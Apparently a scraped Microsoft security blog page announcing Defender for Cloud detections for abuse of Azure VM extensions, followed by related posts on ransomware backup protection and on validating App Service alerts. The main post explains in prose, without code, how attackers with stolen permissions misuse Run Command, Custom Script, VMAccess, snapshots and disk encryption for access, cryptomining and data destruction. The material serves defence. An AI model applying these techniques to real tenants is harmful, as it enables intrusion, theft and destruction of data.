Microsoft Defender for Cloud latest protection against sophisticated abuse of Azure VM Extensions
Introduction Throughout recent years, the IT world has shifted its workloads, management layers, and machines to the cloud, thus introducing a new attack surface, accompanied by new attack vectors. The following introduced a tactic for threat actors to deploy their cyber-attacks against organizations’ cloud environments, gaining strong permissions, operating for financial gain, and more. Upon succeeding in compromising an identity with sufficient permissions in Azure, threat actors often try to abuse existing features within the environment that allow them to deploy their malicious activity stealthily, efficiently, and easily, and one special feature is: Azure VM extensions. Announcing new detections and alerts against extension abuse Azure VM extension abuse has never left Microsoft’s sight since its first appearance, and previous publication has discussed the topic. Today, we continue to deliver customer protection as a result of extensive research and monitoring, thus announcing the new and enhanced protection capabilities that Microsoft Defender for Cloud offers as part of Microsoft Defender for Servers plan 2 offering, against extension abuse, and its importance. Our customers can enjoy the protection capabilities effortlessly, without the need to manually deploy a dedicated agent on the VM. Azure virtual machine extensions Azure virtual machines extensions are small applications that provide post-deployment configuration and automation on Azure VMs, such as software updates, code and script execution, antimalware deployments, and more. VM extensions play an instrumental role in workload management and VM maintenance. Many organizations’ cloud environments are dependent on the extension’s capabilities, such as automation in configuration deployment, security management, continuous monitoring, troubleshooting and log analytics. On the other hand, extensions can be abused as a powerful cloud-native tool by threat actors who gained an initial foothold in the victim’s Azure environment. Solely dependent on Azure RBAC permissions, threat actors can abuse VM extensions to execute operations with high privileges to perform stealthy and destructive cyber-attacks. In this blog, we will discuss the various extensions, their uniqueness, the corresponding MITRE techniques associated with them that are abused in the wild and researched in the security world, and introduce Microsoft Defender for Cloud new series of alerts that combats this abuse. Threat hunting Reconnaissance Network Watcher, Azure Monitor, VMSnapshot extensions The following extensions allow different kinds of data collection and monitoring over network traffic, resources data, diagnostics, analytics and more. Network Watcher allows threat actors to capture network traffic, analyze packets, verify IP flow, and diagnose network security groups (NSGs). The Network Watcher tool can be invaluable for advanced threat actors looking to learn about the environment topology and identify weaknesses in the victim’s cloud environment by: Understanding the structure of the environment’s security framework. Using IP Flow to verify packet allowance to find exposed resources. Analyzing existing NSGs to determine how to manipulate them to gain access and then persistence. Azure Monitor allows threat actors to create data collection rules over resources, in order to capture various kinds of machine logs and events. Capturing Windows events of different kinds like security, system, and applications logs, could be of high importance for threat actors to gather information about the running compute inside the environment. This can be done by creating a dedicated log analytics that will consume the logs from the Azure Monitor agent on the VM. VMSnapshot allows threat actors to capture VM disks snapshots as part of Azure Backup service. Through Microsoft’s extensive research and investigation of recent sophisticated attacks, evidence has shown that not only do threat actors attempt to reset passwords and gain access and persistence to VMs by leveraging the VMAccess extension (which will be discussed later on), they also attempt to capture disk snapshots of VMs that capture their interest during the initial phases, by leveraging Azure Backup service capabilities. Capturing disk snapshots allows threat actors to export critical data from the VM’s disks during a short window of time, to a local or remote location, using a dedicated URL for downloading, or copying the disk to another location in the environment. After that, threat actors will attempt to attach the snapshots of the disks to their own controlled machines, after configuring them to the right format. Execution Azure VM extensions offer a variety of ways for code execution and running scripts as SYSTEM/sudo on your virtual machines, thus providing threat actors with a powerful tool to facilitate deployments of their different attack techniques, at scale: (Managed) Run Command Run Command uses the VM agent to run scripts on the VM, as SYSTEM/sudo. It can be abused in a variety of ways, from running recon commands to learn about the victim’s cloud environment, creating local admin users for persistence, to downloading payloads on the machine, executing crypto miners for impact, and more. Custom Script extension (CSE) The custom script extension allows the user to download and run a script on the VM, as SYSTEM/sudo. CSE can be used to deploy different attack vectors at scale especially when looking to run the same script across different VMs within a virtual machine scale set (unlike Run Command). As an example, Microsoft witnessed the following techniques being abused by a threat actor: Password Spraying campaign Threat actor successfully gains initial access to user accounts in Azure. Mass compute resource creation Threat actor sets up the crypto mining environment with the needed network resources. Mass deployment of XMRig software on all compute using Custom Script Extensions to initiate the crypto mining campaign. Azure Desired State Configuration (DSC) extension The extension uploads and applies a DSC configuration on the VM. Using DSC, threat actors can maliciously deploy scheduled tasks, apply configurations, and execute scripts, resulting in the deployment of a backdoor, connection to a C2 (Command and Control), extracting the VM managed identity, and more. Persistence Virtual Machine Access extension The VMAccess extension allows the user to manage administrative users and reset access on Azure VMs. Threat actors often abuse the VMAccess extension to gain access to VMs inside the victim’s environment, after they gain initial foothold, by resetting passwords, SSH keys, and manipulating the admin users in the VM. As a result, they can choose their target wisely inside the environment and gain access to it, only by using the cloud native RBAC roles needed to execute the extension, thus, discovering sensitive information and disrupting critical workloads inside the environment. We can see that the new user can successfully run commands as sudo: Impact GPU Driver extension The extension provides the ability to install the NVIDIA or AMD GPU drivers on supported compute VMs, which are GPU card equipped, in order to take full advantage of the card capabilities. Threat actors can leverage this capability to deploy a GPU driver on supported Azure VMs in the victim’s Azure environment and follow up with the installation of crypto mining software by leveraging the Custom Script Extension, or any other technique, and move on to the mining phase. Disk Encryption extension Azure Disk Encryption uses BitLocker to provide full disk encryption on Azure virtual machines. Threat actors can abuse this extension by attempting to encrypt the VMs’ disks in the victim’s cloud environment that captures the threat actor’s interest, with the goal to render all data permanently inaccessible by attempting to delete the encryption key or the key vault that contains the key. In such cases, it is crucial for the victim to be aware of purge protection and the protection measures that Microsoft provides to delay/prevent the deletion of the encryption key. Detection After going through the abuse scenarios for the variety of VM extensions, we will dive through Microsoft’s new detection capabilities and techniques, and how we are able to defend our customers through continuous monitoring and analysis of suspicious signals, from the control plane to the endpoint. Microsoft Defender for Cloud is announcing a new series of alerts targeting Azure VM extensions abuse, which are available to the customer through Microsoft Defender for Servers plan 2. Not only does the new series of detections target a wide range of abuse techniques, but it also targets a wide range of extension abuse types, to protect our customers against attack vectors that emerge. Through extensive research, we have been able to single out and identify the suspicious signals for which the likelihood of a breach is high, and as a result of studying the user’s behavior, and monitoring for such signals, we are able to detect suspicious activity, some of the signals are the following: Usage of VM extensions by a user account which hasn’t used any VM extensions recently. A sudden surge in extension usage by a suspicious user account, which might indicate a post-breach reconnaissance, impact, or persistence activity. Code or script execution containing parts that indicate a malicious intent. Usage of a combination of extensions in a short time windows which might indicate a recon attempt. Mitigation Identities in Azure require certain high privileged roles in Azure to be able to use extensions, this is yet another example of how identities and permissions represent the core of the cloud environment’s access controls. As a result, we recommend building a strong framework which is least privileged based, in order to provide the identity with the least permissions needed to perform its dedicated and legitimate operations and prevent imminent attacks. In addition to the above, continuous monitoring and detection efforts are essential to remediate ongoing attacks and prevent possible future ones. Conclusion With the advent and continued growth of cloud computing in Azure, many threat actors rely on techniques that facilitate their deployment of malicious activities, thus targeting Azure VM Extensions. As a result of in-depth research and continued monitoring, Microsoft Defender for Cloud is announcing a detection campaign to provide its customers with strong security measures for sophisticated attack vectors and threat actor campaigns targeting extensions abuse. Learn more about VM extensions: Link Learn more about the new series of alerts: Release Notes, Azure VM extensions alerts table Learn more about Defender for Cloud plans: Link Learn more about Defender for Servers plans: LinkProtect Against OWASP API Top 10 Security Risks Using Defender for APIs
The OWASP API Security Project focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of APIs. In this post, we'll dive into how Defender for APIs (a plan provided by Microsoft Defender for Cloud) provides security coverage for the OWASP API Top 10 security risks.Announcing Microsoft Defender for Cloud capabilities to counter identity-based supply chain attacks
In this blog, we will demonstrate the mechanisms of identity-based supply chain attacks in the cloud and discuss how service providers’ cloud access can be used by attackers for identity-based supply chain attacks. We will also show how a new alert enrichment in Microsoft Defender for Cloud can help to detect and remediate those threats.
How-to use Microsoft Defender for Cloud Ransomware alerts to preserve Azure Backup recovery points
Credits: This blog post has been co-authored by Chaya Aishwarya. Automation samples developed by Akhil Nampelly, Rajath Ranganath and Vasavi Pasula. Reviewers: Srinath Vasireddy, Anshul Ahuja, Neeraj Jain, Pratik Joshi, Kalyan Karri, Sivasubramanian Narayanan, Yuri Diogenes Introduction Ransomware attacks deliberately encrypt or tamper data to force your organization to pay money to attackers. These attacks can target your data and your backups. The best way to prevent falling victim to ransomware is to implement preventive measures and have tools that protect your organization from every step that attackers take to infiltrate your systems. You can leverage Azure native ransomware protection capabilities and implement the best practices to ensure your organization is optimally positioned to prevent, protect, and detect potential ransomware attacks on your Azure assets. One of the most important steps you can take to protect your data is to have a reliable backup infrastructure. But it's just as important to ensure that your data is backed up in a secure fashion, and that your backups are always protected. Azure Backup provides several security capabilities to help you protect your backup data – Soft Delete is enabled by default, even if a malicious actor deletes a backup (or backup data is accidentally deleted), the backup data is retained for 14 additional days, allowing the recovery of that backup item with no data loss. Immutable vault can help you protect your backup data by blocking any operations that could lead to loss of recovery points. You can configure Multi-user authorization (MUA) for Azure Backup as an additional layer of protection to critical operations on your Recovery Services vaults. Even if security best practices are not followed and notifications aren't configured for the Recovery Services vault, critical alert for destructive operation (such as stop protection with delete backup data) are still raised and an email is sent to subscription owners, admins, and co-admins (learn more). Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and multicloud (Amazon AWS and Google GCP) resources. Defender for Cloud generates security alerts when threats are identified in your cloud, hybrid, or on-premises environment. It is available when you enable enhanced security features. Each alert provides details of affected resources along with the information you need to quickly investigate the problem and steps to take to remediate an attack. In the event of a malware or a ransomware attack on an Azure Virtual Machine, Microsoft Defender for Cloud detects suspicious activity and indicators associated with ransomware on an Azure VM and generates a Security Alert. Here are the Defender for Cloud Alerts that trigger on a Ransomware detection: Detected Petya ransomware indicators Ransomware indicators detected Behavior similar to Fairware ransomware detected Behavior similar to ransomware detected Defender for Cloud provides threat intelligence reports containing information about detected threats. This helps incident response teams investigate and remediate threats. For more details: Microsoft Defender for Cloud threat intelligence report | Microsoft Learn Solution details Assume Virtual Machine protected by both Defender and Azure Backup is breached. Defender detects the ransomware, raises an alert which includes details of the activity and suggested recommendations to remediate. As soon as a ransomware signal is detected from Defender, ensuring backups are preserved (i.e., paused from expiring) to minimize the data loss is top of our customers’ mind. This sample solution demonstrates integration of Azure Backup with Microsoft Defender for Cloud for detection and response to alerts to accelerate response. Sample illustrates following three uses cases: 1) ability to send email alerts to backup admin 2) SecOps admin triages and manually triggers logic app to secure backups and 3) Workflow to automatically respond to the alert by performing the Disable Backup Policy (Stop backup and retain data) operation. Step-by-Step instructions Prerequisites: Enable Azure Backup for Virtual Machines Enable Microsoft Defender for Servers Plan 2 for the Subscription Note: This sample solution is scoped to Azure Virtual Machines. The logic app can only be deployed at a subscription level, which means that all Azure VMs under the subscription can leverage the logic app for pausing expiry of recovery points in the event of a security alert. Step 1: Deploy the logic app Note: Owner access on the Subscription is needed to deploy the logic app. Visit Github and click on ‘Deploy to Azure’ as shown below: Input the following values in the deployment page: Subscription: Select the Subscription whose Azure VMs the logic app should govern. Name: Input a suitable name for the logic app. Region: Choose the region with which the Subscription is associated. Email: Input the email address of the Backup admin for them to receive alerts when policy is suspended. Resource Group: Logic apps need to be associated with a Resource Group for deployment. Choose any Resource Group for the same. Managed Identity: Create and assign a Managed Identity (for guidance on creating a User-defined Managed Identity, visit here ) with the below minimum permissions for the service to perform the operation of ‘Stop backup and retain data’ on the backup item automatically in the event of a malware alert. Virtual Machine Contributor on the subscription Backup Operator on the subscription Security Reader Note: To further tighten the security, we recommend you create a custom role and assign that to the Managed Identity instead of the above built-in roles. This will ensure that all the calls run with least privileges. For more details on custom role, visit Github article. Managed Identity Subscription: Input the name of a Subscription that the Managed Identity should reside in. Managed Identity Resource Group: Input the name of a Resource Group that the Managed Identity should reside in. Step 2: Authorize Office 365 for email alerts To authorize the API connection to Office 365: Go to the Resource Group you have used to deploy the template resources. Select the Office365 API connection (which is one of the resources you just deployed) and click on the error that appears at the API connection. Press Edit API connection. Press the Authorize button. Make sure to authenticate against Azure AD. Press Save. Step 3: Triggering the logic app The logic app deployed in step 1 can be triggered manually or automatically by leveraging workflow automation. Triggering manually: Visit Microsoft Defender for Cloud and navigate to Security Alerts in the sidebar. Click on the required alert to expand details. Click on ‘Take action’ and choose ‘Trigger automated response’ and click on ‘Trigger logic app’. Search the logic app deployed in step 1 by name and click ‘Trigger’. Note: The minimum RBAC permissions needed for triggering an action for the security alert are as follows: Logic app Operator, Security Admin role Triggering using workflow automation via Azure portal: Workflow automation will ensure that in the event of a security alert, your backups corresponding to the VM facing this issue will automatically reach ‘Stop backup and retain data’ state hence suspending policy and pause recovery point pruning. You can also use Azure Policy to deploy workflow automations. Note: Minimum roles of Logic app Operator and Security Admin are required to deploy the workflow automation. Visit Defender for Cloud's sidebar, select Workflow automation. Select Add workflow automation. The options pane for your new automation opens. Input the following values: Name and Description: Input a suitable name for the automation. Subscription: Define the scope of the automation, this should be the same as the scope of the logic app. Resource Group: Choose the RG in which the automation will reside. Defender for Cloud Data Type: Security Alert Alert name contains: ‘Malware’ or ‘ransomware’ Alert severity: High Logic app: Choose the logic app deployed in step 1 Step 4: Email Alerts Upon disabling the backup policy on the backup item, the logic app also sends an email to the ID entered during deployment. The email ID should ideally be that of the Backup Admin. The alert can then be investigated, and the backups can be resumed once the issue is resolved or if it is a false alarm. Additional Resources: What is Microsoft Defender for Cloud? - Microsoft Defender for Cloud | Microsoft Learn Reference table for all security alerts in Microsoft Defender for Cloud | Microsoft Learn https://learn.microsoft.com/en-us/azure/backup/backup-azure-immutable-vault-concept https://learn.microsoft.com/en-us/azure/backup/backup-azure-immutable-vault-how-to-manage https://techcommunity.microsoft.com/t5/azure-storage-blog/how-azure-backup-soft-delete-protects-from... https://learn.microsoft.com/en-us/azure/backup/backup-azure-security-feature-cloud https://learn.microsoft.com/en-us/azure/backup/backup-azure-enhanced-soft-delete-about https://learn.microsoft.com/en-us/azure/backup/multi-user-authorization-concept?tabs=recovery-servic... https://learn.microsoft.com/en-us/azure/backup/backup-azure-security-feature-cloud#frequently-asked-...Validating Microsoft Defender for App Service Alerts
Disclaimer This document is provided “as is.” MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS DOCUMENT. This document does not provide you with any legal rights to any intellectual property in any Microsoft product. You may copy and use this document for your internal, reference purposes. Introduction Microsoft Defender for App Service helps organizations be more secure by providing dedicated security analytics for your App Service resources. The purpose of this article is to provide specific guidance on how to validate Microsoft Defender for App Service alerts, by simulating a suspicious activity on applications running over App Service. Preparation The first step in validating Microsoft Defender alerts for App Service is to ensure that Microsoft Defender for App Service is enabled on the subscription(s) as shown in Figure 1, that you want to use to validate the alert. Enabling Microsoft Defender for App Service provides monitoring and threat detection for a multitude of threats to your App Service resources. Additionally, enabling Microsoft Defender for App Service, surfaces security findings with recommendations on how to harden your resources covered by the App Service plan. To learn more about Microsoft Defender for App Services, watch this video. Microsoft Defender for Cloud plans can be enabled individually. For the purpose of validating the scenario covered in this article, pre-requisite is to solely enable Microsoft Defender for App Service. After enabling Microsoft Defender for App Service, you need to determine the scenario that you want to validate. Common scenarios that can be simulated range from php uploads, to NMAP scanning, or even Content Management System (CMS) fingerprinting. When determining the scenarios for which you would like to validate alerts, you can also consult the reference guide of Alerts for Azure App Service. Microsoft Defender for App Service alerts are mapped to and cover almost the complete MITRE ATT&CK tactics from pre-attack to command and control, which can be useful when deciding which scenario(s) you wish to simulate. In case you wish to solely test that the pipeline is working, there is also a like alert for App Service which can be invoked by making a web request to a “/This_Will_Generate_ASC_Alert” URI. I.e. if your site is named ‘foo’, making a request to https://foo.azurewebsites.net/This_Will_Generate_ASC_Alert, will generate an alert similar to the one shown in Figure 2. In this article, we will simulate the scenario of accessing a suspicious PHP page located in the upload folder, which will generate the “PHP file in upload folder” alert. This type of folder doesn’t usually contain PHP files and its existence might indicate exploitation taking advantage of arbitrary file upload vulnerabilities. Implementing In order to simulate this scenario, you could either use an existing Web App or create a new one. When creating a new Web App, you can deploy a PHP app to Azure App Service on Linux (as a runtime stack select PHP 7.4) The alert that will be generated applies to both App Service on Linux and Windows. Once you’ve created the App Service Plan and the Web App, install Wordpress 5.8 (including creating an Azure Database for MySQL server). To learn more about how to create a PHP Web App in Azure App Service, read this guidance. Note: In most cases, once a new web site is created, it might take up to 12h for alerts related to a newly created web site to appear. To simulate the scenario of accessing a suspicious PHP page located in the upload folder, a PHP page is required. You can use the sample below to create a test PHP page (shown in Figure 3) and save it as a PHP file. Afterwards, navigate to “/wp-content/uploads/2021/08/” and upload the file. Important: After you’ve uploaded the PHP file to this folder, you need to browse to this PHP page using a browser (similarly to Figure 5). Please note that the output on the page, will depend on the code in your test PHP file. Validating Once Microsoft Defender for App Service generates the alert on target subscription(s), you can find it in the “Security alerts” section of the Microsoft Defender for Cloud dashboard. Selecting the generated alert (in this case “PHP file in upload folder”) will open a blade, which provides more context and rich metadata about the alert (similar to Figure 6). When validating the alerts, be sure to consult the full list of App Service alerts. You can also export Microsoft Defender for Cloud alerts to a SIEM (i.e. Azure Sentinel or 3 rd party SIEM). Learn more about how to stream alerts to a SIEM, SOAR or ITSM. Learn more about how to investigate Microsoft Defender for Cloud alerts using Azure Sentinel. Learn more about Analysing Web Shell Attacks with Microsoft Defender for Cloud data in Azure Sentinel - Microsoft Tech Community. Final Considerations Microsoft Defender for App Service is all about providing threat detection and security recommendations for applications running over App Service. This article focuses on validating alerts for Microsoft Defender for App Service, by simulating a specific scenario, namely accessing a suspicious PHP page located in the upload folder. Properly executing the steps outlined in this article generates the security alert “PHP file in upload folder”. This article is not intended to cover all scenarios, but it does provide real value as you get started with validating Microsoft Defender for App Service alerts. Remember to keep an eye out for other article from this series, which can be found on our official ASC Tech Community. Reviewers: @Yuri Diogenes, Principal PM @Tomer Spivak, Senior PM Contributors: Dotan Patrich, Principal Software Engineer, Yossi Weizman, Senior Security Researcher Ram Pliskin, Senior Security Researcher Manager Lior Arviv, Senior PMUncover the latest cloud data security capabilities from Microsoft Defender for Cloud
Learn about the latest multicloud data security capabilities from Microsoft Defender for Cloud to strengthen your data security posture and protect your cloud data estate against data breaches and malware distribution.
